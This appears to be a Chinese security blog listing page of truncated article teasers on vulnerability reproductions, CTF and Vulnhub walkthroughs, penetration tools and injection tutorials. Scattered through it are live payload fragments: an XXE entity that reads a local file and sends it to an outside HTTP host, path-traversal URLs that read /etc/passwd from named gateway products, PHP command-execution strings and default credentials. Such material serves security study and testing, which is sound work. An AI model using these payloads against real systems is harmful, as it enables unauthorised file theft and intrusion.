PHP比较漏洞一, 字符串与数字比较,0e’字符串比较在 PHP 中处理字符串和数字比较时需要小心谨慎的重要性，尤其是在安全敏感的应用中。在某些情况下，PHP 的类型强制转换可能会导致意外和潜在的安全漏洞。 var_dump("admin" 0); //true …

红队攻防实战系列一之Cobalt Strike

他日若遂凌云志，敢笑黄巢不丈夫本文首发于先知社区，原创作者即是本人前言在红队攻防中，需要我们拥有综合能力，不仅仅是web渗透的漏洞挖掘与利用，边界突破的方式有很多种，当然这需要我们拥有很强的意识…

2023最新 chromium 内核存在任意文件读取0day 漏洞！(附exp)

文章目录 0x01 漏洞详情一、官方的公告0x02 EXP利用0x03 利用场景0x04 漏洞危害0x05 防范总结0x01 漏洞详情受害者只要点击了攻击者进行构造的链接，即可被读取任意文件。简短描述：Libxslt 是基于 WebKit 的浏览器（例如 chrome、safari 等）中使用的默认 XSL 库。Libxslt…

【Java安全】Java反射机制-获取并调用类的成员方法

文章目录前言利用反射机制获取类的成员方法总结前言 Java反射(Reflection)是Java非常重要的动态特性，通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息，还可以动态创建Java类实例、调用任意的类方法、修改任意的…

【漏洞复现】万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞附POC

漏洞描述万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害…

HostHunter虚拟主机发现

HostHunter虚拟主机发现 1.HostHunter2.安装3.参数解释4.实例1.HostHunter HostHunter 一种工具，用于有效发现和提取提供大量目标 IPv4 或 IPv6 地址的主机名。HostHunter 利用简单的 OSINT 和主动协调技术将 IP 目标与虚拟主机名进行映射。这对于发现组织的真正攻击面特别有…

PHP 基础编程 1

文章目录前后端交互尝试php简介php版本php 基础语法php的变量前后端交互 - 计算器体验php数据类型php的常量和变量的区别php的运算符算数运算符自增自减比较运算符赋值运算符逻辑运算 php的控制结构ifelseelse if 前后端交互尝试前端编程语言：JS （Java…

访问控制列表ACL学习

ACL概念 ACL: ACL 是 Access Control List（访问控制列表）的缩写。它是一种用于管理和控制访问权限的机制或数据结构。ACL 用于确定谁可以访问特定资源（例如文件、文件夹、网络资源等）以及他们可以执行的操作。ACL 通常由一系列访…

渗透测试之Kali如何利用CVE-2019-0708漏洞渗透Win7

环境： 1.攻击者IP：192.168.1.10 系统: KALI2022（vmware 16.0） 2.靶机IP：192.168.1.8 系统：Windows 7 6.1.7601 Service Pack 1 Build 7601 已开启远程协助RDP服务开启了3389端口问题描述： KALI 如何利用CVE-2019-0708漏洞渗透Win7 解决方案： 1.打开kali，msf搜索…

ctfshow-命令执行(web73-web77)

web73 用不了上一题的通用poc了因为禁用了strlen 但是可以改一个函数自定义一个函数只要是能实现strlen效果即可 cvar_export(scandir(/));exit(0); 根目录下有一个flagc.txt文件 cinclude(/flagc.txt);exit(0); web74 禁用了scandir函数那就使用web72的glob协议查看目录下…

ctfshow php特性(web89-web101)

目录 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web100 web101 php特性(php基础知识) web89 <?php include("flag.php"); highlight_file(_FILE_);if(isset($_GET[num])){$num$_GET[num];if(preg_match("/[0-9]/&…

Vulnhub靶场MATRIX-BREAKOUT: 2 MORPHEUS

攻击机192.168.223.128 目标机192.168.223.140 主机发现nmap -sP 192.168.223.0/24 端口扫描nmap -p- 192.168.223.140 开启了 22，80，81三个端口看一下web界面是inguardians 写给jaybeale的信，说计算机被密码锁住了，至少…

渗透专用虚拟机（公开版）

0x01 工具介绍 okfafu渗透虚拟机公开版。解压密码：Mrl64Miku，压缩包大小：15.5G，解压后大小：16.5G。安装的软件已分类并在桌面中体现，也可以使用everything进行查找。包含一些常用的渗透工具以及一些基本工…

[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯（一键三连）😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末…

渗透测试常用专业术语

相信大家和我一样，搞不清这些专业名词的区别，所以我来整理一下。 1. POC、EXP、Payload与Shellcode POC：全称 Proof of Concept ，中文概念验证 ，常指一段漏洞证明的代码。 EXP：全称 Exploit &#xf…

五、Kali Linux 2 漏洞扫描技术

漏洞扫描技术对于渗透测试者来说，及时了解这些漏洞的信息是一项必备的技能。目前很多企业都采用了漏洞扫描器来对网络和系统来进行分析。漏洞扫描器通常是由两个部分组成的，一个是进行扫描的引擎部分，另一个是包含了世界上大多数系统和软件…

十一、Kali Linux 2 基于结构化异常处理的渗透

基于SEH的渗透在上一章中，我们讲解了如何针对一个软件来编写它的渗透模块，这个编写的过程并不复杂，主要是找到一个地址固定的“JMP ESP”指令。另外我们还介绍了一些有用的技能，这包括了如何找到改写EIP内容的地址，如…

低学历能不能学会黑客技术？别再被忽悠了！

学历比较低的人能不能学会黑客技术？龙叔我今年44岁，在IT行业打拼了20多年，今年也是重新转战网络安全，我可以很肯定的告诉你，学历低一样能学会黑客技术!我举几个例子你就明白了。一、上技校的李俊 2007年曾让全国网民…

记src-Juniper

一、hunter搜索web.title”Juniper Web Device Manager”，查找到香港的一处资产。二、访问相关网页，界面就是Juniper登录界面。三、根据编号为CVE-2023-36845的利用方法，抓包，修改提交方式，成功读取到文件。原始包…

Discuz！X 3.4任意文件删除漏洞

复现过程： 1.访问http://x.x.x/robots.txt（文件存在） 2.登录弱口令账号：admin密码：admin 3.来到个人设置页面找到自己的formhash： 4.点击保存，抓包来到这个参数：birthprovin…

【漏洞复现】博华网龙设备存在命令执行漏洞

漏洞描述中科博华是一家主营软件产品开发、信息安全产品研发，兼营计算机系统集成与信息安全服务为一体的高科技企业。拥有七项专利和五十余项软件著作权。具有CMMI、商用密码生产和销售许可证、3C认证、系统集成、信息安全服务和涉密资质。该产商多个安全设备的系统存在远…

【漏洞复现】天OA存在任意文件上传漏洞

漏洞描述华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成…

Upload_Bypas，一款针对文件上传的Fuzz检测工具

Upload_Bypas，一款针对文件上传的Fuzz检测工具 1.工具概述2.安装3.参数解析4.使用方法1.工具概述 Upload_Bypass 是一个强大的工具，旨在帮助渗透测试人员和 Bug Hunters 测试文件上传机制。它利用各种漏洞赏金技术来简化识别和利用漏洞的过程，确保对 Web 应用程序进行全面评…

锐捷Smartweb管理系统默认开启Guest账户漏洞

通过弱口令进行登录 guest/guest 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免责声明：由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失，均由使用者本人负责， 文章…

vulnhub靶场，JANGOW: 1.0.1

vulnhub靶场，JANGOW: 1.0.1 环境准备靶机下载地址：https://www.vulnhub.com/entry/jangow-101,754/ 攻击机：kali（192.168.109.128） 靶机：JANGOW: 1.0.1（192.168.109.198） 下载好靶…

安全错误配置

安全错误配置定义安全配置错误可以发生在一个应用程序堆栈的任何层面，包括网络服务，平台，web服务器、应用服务器、数据库、框架、自定义的代码、预安装的虚拟机、容器、存储等。这通常是由于不安全的默认配置、不完整的临时配置、开源云存…

xml外部实体注入（XXE）

XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理建立*.dtd <!ENTITY % file SYSTEM "php://filter/readconvert.base64-encode/resourcefile:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM http://192.168.0.105:8080?p…

Nmap高级使用，性能优化和防火墙欺骗

Nmap高级使用，性能优化和防火墙欺骗 1.时间和性能2.防火墙/IDS躲避和哄骗Nmap基础篇参考 1.时间和性能改善扫描时间的技术有：忽略非关键的检测、升级最新版本的Nmap(性能增强不断改善)。优化时间参数 1、--min-hostgroup <size>;--max-hostgroup <size> (调…

渗透测试之——信息收集思路

请遵守网络安全法渗透测试时要和客户定好时间再使用扫描器。渗透测试切记不要渗透客户所给域名的同级域名，可以渗透所给域名的子域名。信息收集永远是渗透测试的第一步。 1. 测试目标 xiusafe.com 2. 域名与ip 渗透测试中IP比域名更适合做渗透； …

宽字节注入漏洞原理以及修复方法

漏洞名称:宽字节注入漏洞描述: 宽字节注入是相对于单字节注入而言的，该注入跟HTML页面编码无关，宽字节注入常见于mysql中，GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的宽字节，实际上只有两字节。宽字节带来的安全问…

使用 python 检测泛洪攻击的案例

使用 python 检测泛洪攻击的案例本案例只使用python标准库通过执行命令来监控异常请求, 并封锁IP, 不涉及其他第三方库工具. import os import time from collections import Counter# 1、update 命令, 采集CPU的平均负载 def get_cpu_load():"""uptime 命令…

网康NS-ASG安全网关任意文件读取

此文件没有对身份进行校验即可下载任意文件构造payload访问漏洞url： /admin/cert_download.php?filegjxbstxdt.txt&certfile../../../../../../../../etc/passwd漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教&…

【漏洞复现】狮子鱼任意文件上传漏洞

漏洞描述狮子鱼CMS（Content Management System）是一种网站管理系统，旨在帮助用户更轻松地创建和管理网站。它具有用户友好的界面和丰富的功能，包括页面管理、博客、新闻、产品展示等。狮子鱼CMS使用简单直观的管理界面，使得网站所有者可以方便地进行内容的发布、管理和…

【JavaFX漏扫开发基础】JavaFx项目基础

文章目录前言一、创建项目二、运行程序三、application的启动方式和生命周期四、生命周期前言创建第一个javafx项目，用Idea编辑器来创建。提示：以下是本篇文章正文内容，下面案例可供参考一、创建项目初创项目，第一个javafx的窗口。依次点击，新建项目点击Jaca…

文件包含漏洞(1),文件包含漏洞的利用原理

文件包含漏洞利用的原理一, 本地文件包含 1. 漏洞利用条件: 在默认情况下, php.ini配置文件中 allow_url_fopenOn 是开启状态. 服务器php脚本中的 include include_once require require_once 等函数用于包含文件中的代码, 如果参数是用户可控的, 则可能被利用来执行系统命…

【漏洞复现】万户协同办公平台ezoffice wpsservlet接口存在任意文件上传漏洞附POC

漏洞描述万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台ezoffice wpsservlet接口存在任意文件上传漏洞。免责声明技术文章仅供参考，任何个人和组织使用网络应…

Mimikatz 的使用（黄金票据的制作）

#江南的江 #每日鸡汤：孤独没有什么反义词，但他的近义词是自由，人生成功的道路上充满了孤独，那么也同样告诉你，你离成功后的自由不远了。 #初心和目标：在网络安全里高出名堂。。。 Mimikatz 本文分为两种…

『渗透测试基础』| 什么是渗透测试？有哪些常用方法？如何开展？测试工具有哪些？优势在哪里？

『渗透测试基础』| 什么是渗透测试？有哪些常用方法？如何开展？测试工具有哪些？优势在哪里？ 1 什么是渗透测试？2 有哪些常用方法？2.1 针对性测试2.2 外部测试2.3 内部测试2.4 盲测2.5 双盲测试 3 …

ToBeWritten之基于ATTCK的模拟攻击：闭环的防御与安全运营

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

vulnhub靶场，DC-9

vulnhub靶场，DC-9 环境准备靶机下载地址：https://www.vulnhub.com/entry/dc-9,412/ 攻击机：kali（192.168.58.130） 靶机：DC-9（192.168.58.155） 下载好靶机之后直接使用VMware Work…

ToBeWritten之硬件攻防

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之理解嵌入式Web Soap协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

【漏洞复现】CVE-2023-6895 IP网络对讲广播系统远程命令执行

漏洞描述杭州海康威视数字技术有限公司IP网络对讲广播系统。海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)存在漏洞。它已被宣布为关键。该漏洞影响文件/php/ping.php 的未知代码。使用输入 netstat -ano 操作参数 jsondata[ip] 会导致 os 命令注入。开发语言：PHP 开…

[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞（CVE-2018-7602）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

CVE-2021-21234 spring-boot-actuator-logview目录遍历漏洞

0x01 影响版本 Spring-Boot-Actuator-logview < 0.2.13 0x02 漏洞分析源码中对filename进行了校验但并未对路径进行校验校验函数如下： 0x03 漏洞复现首先开vulhub的镜像点击下载，原数据包如下送入repeater打入payload，复现…

渗透测试报告如何编写注意事项

本专题开始，这里以倒序方式开展渗透测试专题，并持续更新，渗透测试将从结果到流程节点逐一开展，因此本篇分析渗透报告面向的对象行业和报告内容流程分析及相关商务客户关系。共计9个方面的内容，1到6主要将与客户交流的具体专业注意事项，方式，方法，7到8说明渗透测试技术…

【漏洞复现】紫光电子档案管理系统存在SQL注入

漏洞描述过滤不严格导致sql注入免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对…

【漏洞复现】DPTech VPN存在任意文件读取漏洞

漏洞描述 DPtech是在网络、安全及应用交付领域集研发、生产、销售于一体的高科技企业。DPtech VPN智能安全网关是迪普科技面向广域互联应用场景推出的专业安全网关产品，集成了IPSec、SSL、L2TP、GRE等多种VPN技术，支持国密算法，实现分支机构…

python工具CISCO ASA设备任意文件读取

python漏洞利用构造payload： /CSCOT/translation-table?typemst&textdomain/%2bCSCOE%2b/portal_inc.lua&default-language&lang../漏洞证明： 文笔生疏，措辞浅薄，望各位大佬不吝赐教，万分感谢。免…

fastjson漏洞批量检测工具

JsonExp 简介版本：1.3.5 1. 根据现有payload，检测目标是否存在fastjson或jackson漏洞（工具仅用于检测漏洞）2. 若存在漏洞，可根据对应payload进行后渗透利用3. 若出现新的漏洞时，可将最新的payload新增至…

Metasploit框架(2), MSF信息搜集

Metasploit框架(2), MSF信息搜集路径以auxiliary开头的都是辅助模块, 比如auxiliary/scanner/smb/smb_version. 信息搜集一般使用nmap和辅助模块下的各种扫描器. 1. db_nmap db_nmap参数的用法与nmap命令相同. db_nmap -sn 192.168.112.1/24 # 扫描存活主机 db_nmap --scr…

【漏洞复现】CVE-2023-47261 Dokmee ECM信息泄露致远程命令执行

漏洞描述 Dokmee ECM是一款国外企业内容管理 (ECM) 软件。每个公司的办公室每个角落都存放着文档、记录和档案。Dokmee 一系列解决方案可以帮助您高效地组织、保护和管理这些文件。支持的文件：PDF、TIFF、Word、Excel、Auto-CAD 绘图、电子邮件等。Dokmee 可以帮助您立即实现…

【漏洞复现】捷诚管理信息系统 SQL注入漏洞

漏洞描述捷诚管理信息系统是一款功能全面，可以支持自营、联营到外柜租赁的管理，其自身带工作流管理工具，能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx接口存在SQL注入漏洞。未经身份认证的攻击者可以通过该漏洞获取数据库敏感信息，深入利用可获取…

【漏洞复现】 Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

漏洞描述 Milesight Router 存在信息泄漏漏洞，攻击者通过访问httpd.log可以获取登陆敏感日志信息。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从…

ctfshow-php特性(web102-web115)

目录 web102 web103 web104 web105 web106 web107 web108 web109 web110 web111 web112 web113 web114 web115 实践是检验真理的要多多尝试 web102 <?php highlight_file(__FILE__); $v1$_POST[V1]; $v2$_GET[v2]; $v3$_GET[v3]; $v4is_numeric($v2)and is…

【漏洞复现】熊海cms 存在sql注入附poc

漏洞描述熊海CMS 是由熊海开发的一款可广泛应用于个人博客，个人网站，企业网站的一套网站综合管理系统。其采用前后端整合设计思路，php，Apache，mysql，前端使用Bootstrap和少许jquery前端框架开发；网站样式设计简洁大方，整体功能点并不多，但功能正好够用；拥有一个…

十二、Kali Linux 2 网络数据的嗅探与欺骗

网络数据的嗅探与欺骗无论什么样的漏洞渗透程序，在网络中都是以数据包的形式传输的，因此如果我们能够对网络中的数据包进行分析的话，就可以深入的掌握渗透的原理。另外很多网络攻击的方法也都是利用发送精心构造的数据包来完成，…

十、Kali Linux 2 编写漏洞渗透模块

漏洞渗透模块接下来你将会学习到渗透模块的开发，在这个过程还将涉及如何利用Metasploit的内置功能来加快开发的过程。我们将会介绍各种漏洞，并会尝试使用各种方法和途径去对这些漏洞进行渗透。除此之外，重点将放在渗透模块的开发上。我们还…

七、Kali Linux 2 渗透攻击

渗透攻击如果把目标系统上的漏洞比作阿克琉斯的脚踵，那么漏洞渗透工具就是帕里斯手中的利箭。在第6章中，我们介绍了如何使用远程控制工具，而在这一章中我们将会介绍如何将远程控制软件的被控端发送到目标主机上。而这个过程最为神奇的方法…

【漏洞复现】OpenTSDB 2.4.0 命令注入(CVE-2020-35476)漏洞复现

漏洞描述官方文档这样描述：OpenTSDB is a distributed, scalable Time Series Database (TSDB) written ontop of HBase；翻译过来就是，基于Hbase的分布式的，可伸缩的时间序列数据库。主要用途，就是做监控系统；譬如收集大规模集群（包括网络设备、操作系统、应用程序…

发送java字节码的数据包

一些Java反序列化漏洞在利用时，要发送Java序列化值（字节码）到服务器。我们在使用一些工具生成字节码后，可以通过python或者burp发送。生成的字节码一般以两种形式存储： 1、二进制形式存储到 poc.ser 2、将字节码…

【漏洞复现】Array VPN任意文件读取漏洞

漏洞描述华耀（中国）科技有限公司（简称：Array）于2003年创建于北京，是优秀的网络功能平台解决方案提供商，也是应用交付解决方案、移动应用接入（SSL VPN）解决方案的全球领导者。华耀现有员工200余人，其中研发团队占到100余人，总部位于北京。并在北京、上海、广州、杭…

[ 攻防演练演示篇 ] 利用 shiro 反序列化漏洞获取主机权限

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

5分钟完成 Kali linux安装（基于VirtualBox）

1. 背景如果你想在一台windows机器上安装kali，用于渗透扫描，那么这篇文章不要错过。方法简单快速。 2. 软件准备下载virtualbox Downloads – Oracle VM VirtualBox 下载专门用于virtualbox的kali镜像 Get Kali | Kali Linux 3. virtualbox安装 …

网络安全必学SQL注入

1.1 .Sql注入攻击原理 SQL注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一，它也是目前被利用得最多的漏洞。要学会如何防御SQL注入，首先我们要学习它的原理。针对SQL注入的攻击行为可描述为通过在用户可控参数中注入SQL语法，破…

渗透测试 | 域名信息收集

0x00 前言信息收集可以说是在渗透测试中最重要的一部分，上文对 IP 信息收集做了一个简要的叙述，认识了 CDN 技术和网络空间搜索引擎。但是很多网站的主站因为访问流量过大的原因通常会使用 CDN 技术，同时也可以有效防止 DDOS 攻击。在域名信…

Meterpreter

高级、动态、可扩展的Payload ● 基于meterpreter上下文利用更多楼哦对那个发起攻击 ● 后渗透测试阶段一站式操作界面完全基于内存的DLL注入式payload（不写硬盘） ● 注入合法系统进程并建立stager ● 基于Stager上传和预加载DLL进行扩展模块的注入&…

小米路由器的未授权访问

01 漏洞产生小米路由器由于Nginx的配置文件，没有配置好，存在一个目录穿越的漏洞。在Nginx当中存在该漏洞，配置如下： location /xxx {alias /abc/; }02 fofa搜索 app“小米路由器” 03 漏洞利用如此配置，攻击者…

[ 常用工具篇 ] CobaltStrike(CS神器)基础(一) -- 安装及设置监听器详解

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

安装VMware Tools

完成系统安装后，首先要安装的就是VMware Tools。该工具可以实现虚拟机和真实主机之间的文件拖拽复制、鼠标滑动切换、随意调整虚拟机画面大小等功能。 STEP 01 执行 “虚拟机-->安装VMware Tools” 命令，如图2-24所示。 STEP 02 等待虚拟机自动加载V…

ToBeWritten之Car ATTCK 矩阵

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之PWN入门介绍/环境搭建

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

文件上传之Apache解析漏洞和Mime检测绕过

文章目录Apache解析漏洞和Mime检测绕过1、解析漏洞2、Mime检测绕过burpsuite修改上传数据类型为image/jpeg修改文件头为GIF89a（jpg文件头）找到上传目录并访问Apache解析漏洞和Mime检测绕过 1、解析漏洞 Apache是从右向左识别文件，例如文件名…

sqlilabs—less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

文章目录Less9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)1、爆库2、爆表2.1、首先该数据库下判断表的数量2.2、判断表的长度2.3、爆表名3、爆字段3.1、判断有几列3.2、判断列长度3.3、判断列名4、查数据4.1、判断username列有几个数据4.2、判断数据…

sqlilabs—less8

文章目录Sqlilabs-less81、判断注入点2、爆字段3、判断数据库(1)判断数据库名长度(2)判断数据库名称4、判断表(1)有几个表(2)分别判断表长度(3)分别判断表名称5、判断列(1)判断表中有几个字段（有几列）(2)判断列长度(3)判断列名6、读取数据(1)判断几个数据…

过最新版安全狗SQL注入

文章目录1、主站漏洞绕狗方法分类2、Fuzz测试3、内联注释order by4、联合查询5、爆库6、获取其他数据库7、获取所有表8、获取所有列9、获取所有数据1、主站漏洞绕狗方法分类使用特殊字符（ASCII码不在32-127范围内）使用特殊语法（非常规的SQL…

Oracle注入联合查询

文章目录0、系统语句1、order by 定字段2、判断字符类型3、判断回显位4、准备工作5、爆表6、从表中获取列名7、获取数据oracle，大型数据库，脚本语言一般是jsp，oracle对应端口1521oracle自带虚拟表dual，oracle的查询语句必须完整的…

SQLmap简单使用

文章目录SQLmap简单使用SQLmap简单使用 python sqlmap.py -u xxxx 指定一个URL地址注入过程中，SQLmap会显示出注入类型，并给出一个payload python sqlmap.py -u xxxx -v 3 3级注入，可以看到详细的注入过程（看到具体语法&#…

SQLserver注入—联合查询

文章目录msSQL注入1、判断是否为SQLserver数据库并检测注入2、order by爆字段3、联合查询爆库名4、爆表5、查列6、获取数据msSQL注入 SQLserver：中大型数据库，相较于MySQL来说更为复杂脚本语言asp，aspx，对应端口1433 三种用户…

Mysql注入—联合查询

文章目录MySQL联合查询1、mysql基础知识PHP魔术引号2、如何判断注入点3、信息收集4、联合查询注入4.1、爆出显示位4.2、收集信息4.3、查询指定库名下的表名信息4.4、查询表user下所有列名4.5、查询指定列下数据5、联合查询注入墨者靶场练习5.1、判断存在注入5.2、爆字段5.3、爆…

漏洞挖掘之信息收集

简介对单一指定目标网站进行黑盒测试，最重要的就是信息收集，因为网站管理员肯定会在用户经常访问的主网站进行经常维护，而那些子域名，没有什么人访问的，可能就会忘记维护，挖洞的突破点大都在于子域名上&am…

HackTheBox Stocker API滥用，CVE-2020-24815获取用户shell，目录遍历提权

靶机地址： https://app.hackthebox.com/machines/Stocker枚举使用nmap枚举靶机 nmap -sC -sV 10.10.11.196机子开放了22，80端口，我们本地解析一下这个域名 echo "10.10.11.196 stocker.htb" >> /etc/hosts 去浏览器访问…

【靶机】vulnhub靶机clover:1

靶机下载地址： Clover: 1 ~ VulnHub 靶机ip：192.168.174.145 Kali ip：192.168.174.128 靶机ip发现：sudo arp-scan -l 靶机开放端口扫描分析： 发现开放了21端口ftp服务，且允许匿名登录 22端口ssh服务 8…

ToBeWritten之汽车信息安全威胁建模

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之固件威胁建模

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之杂项

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

对SQL注入进行的一些总结

简介 SQL注入作为一种攻击方式最早可以追溯到20世纪90年代中期，当时Web应用程序开始流行并广泛使用数据库作为其后端数据存储。最早的SQL注入攻击是通过简单地在Web表单输入框中输入SQL代码来实现的，攻击者可以通过修改输入参数来篡改数据库查询的行为&a…

为什么我说自学黑客（网络安全），一般人还是算了吧！

一、自学网络安全学习的误区和陷阱 1.不要试图先成为一名程序员（以编程为基础的学习）再开始学习我在之前的回答中，我都一再强调不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，而…

网络安全面试题合集

以下为网络安全各个方向涉及的面试题，星数越多代表问题出现的几率越大，祝各位都能找到满意的工作。注：本套面试题，已整理成pdf文档，但内容还在持续更新中，因为无论如何都不可能覆盖所有的面试问题&#xf…

XPath注入

0x00：介绍我们都知道数据库，以表的形式来存储数据。除了数据库还有一种方式即以文件形式存储，例如 xml 文件 txt 文件等。当然像文件存储数据一般很少用，文件存储有弊端，数据过多时，读写都很慢没有索引。…

XML 注入

0x00：简介首先先简单的说一下 xml，看一下它的全名称，叫 Xtensible Markup Language，即可扩展的标记语言，可直接理解为内容可自定义扩展，标签可自定义扩展。其实就是一个文本格式的文件，以 xml…

震惊——某白帽破解zabbix系统，实现命令执行，最终获取shell

如果你坚持了自己的梦想，全世界都会为你让路。一、漏洞说明 zabbix（[zbiks]）是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案（百度百科定义）。很多Zabbix的admin口令使用了初始账号&…

在网络安全领域中，主要有哪些技术方向？

入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等，每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低，也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程👇 网…

【红队靶场】暗月五月考核靶场sunday

红队靶场 🎉B站配套视频：【顺手挂个三连呗】 https://www.bilibili.com/video/BV1xu4y1Z71y/?share_sourcecopy_web&vd_source0e30e09a4adf6f81c3038fa266588eff🔥系列专栏：红队靶场 🎉欢迎关注🔎点赞…

一个轻量级Web蜜罐（附下载地址）

Loki 0x01 Why 目标: 抓漏洞. 大概是没有找到啥子开源的符合我预期的蜜罐吧，所以自己动手写了。 0x02 What 想做什么样的蜜罐? 1.便于维护,随开随用,配置简单。 2.Web低仿真即可,且只抓Web流量。 3.不同端口指向不同的页面,响应头配置等。 0x03 How SpringB…

自学网络安全（白帽黑客）必看！OWASP十大漏洞解析！

在学习网络安全之前，需要总体了解安全趋势和常见的Web漏洞，在这里我首推了解OWASP，因为它代表着业内Web安全漏洞的趋势； 目录一、OWASP简介 OWASP Top 10: 2013版至2017版改变了哪些内容二、OWASP Top 10 A1:注入漏洞 A2:…

DVWA下载、安装及使用教程，网络安全小白必看！

DVWA是一款基于PHP和mysql开发的web靶场练习平台，集成了常见的Web漏洞。旨在为安全人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程； 一、DVMA介绍 DVWA官网 (opens new window)DVWA Github (ope…

高考之后想学习网络安全，网络安全/信息安全是一个好的专业吗？

本人信息安全专业毕业，在甲方互联网大厂安全部与安全乙方大厂都工作过，有一些经验可以供对安全行业感兴趣的人参考。或许是因为韩商言让更多人知道了CTF，也或许是因为网络安全越来越受国家重视，安全最近愈加火爆了。当然&#x…

为什么说网络安全是IT行业最后的红利？

前言 “没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。网络安全行业特点 1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万…

判断系统（服务器）中是否存在后门程序的2个工具

判断系统（服务器）中是否存在后门程序的2个工具 Chkrootkit 官网：http://www.chkrootkit.org 下载地址： ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz 安装： tar -zxvf chkrootkit.tar.gz cd chkrootki…

十五、Kali Linux 2 拒绝服务攻击

拒绝服务攻击拒绝服务攻击即是攻击者想办法让目标机器停止提供服务，是黑客常用的攻击手段之一。其实对网络带宽进行的消耗性攻击只是拒绝服务攻击的一小部分，只要能够对目标造成麻烦，使某些服务被暂停甚至主机死机，都属于拒绝服…

XCTF 攻防世界 pwn新手题(get_shell)

XCTF 攻防世界 pwn新手题(get_shell) 这道题十分简单，题目描述说运行就能拿到shell，可以先用nc尝试连接一下题目场景给的地址，直接就连接上了： 然后，ls，cat flag直接就可以获取到flag了

XCTF 攻防世界 Reverse新手题（getit）

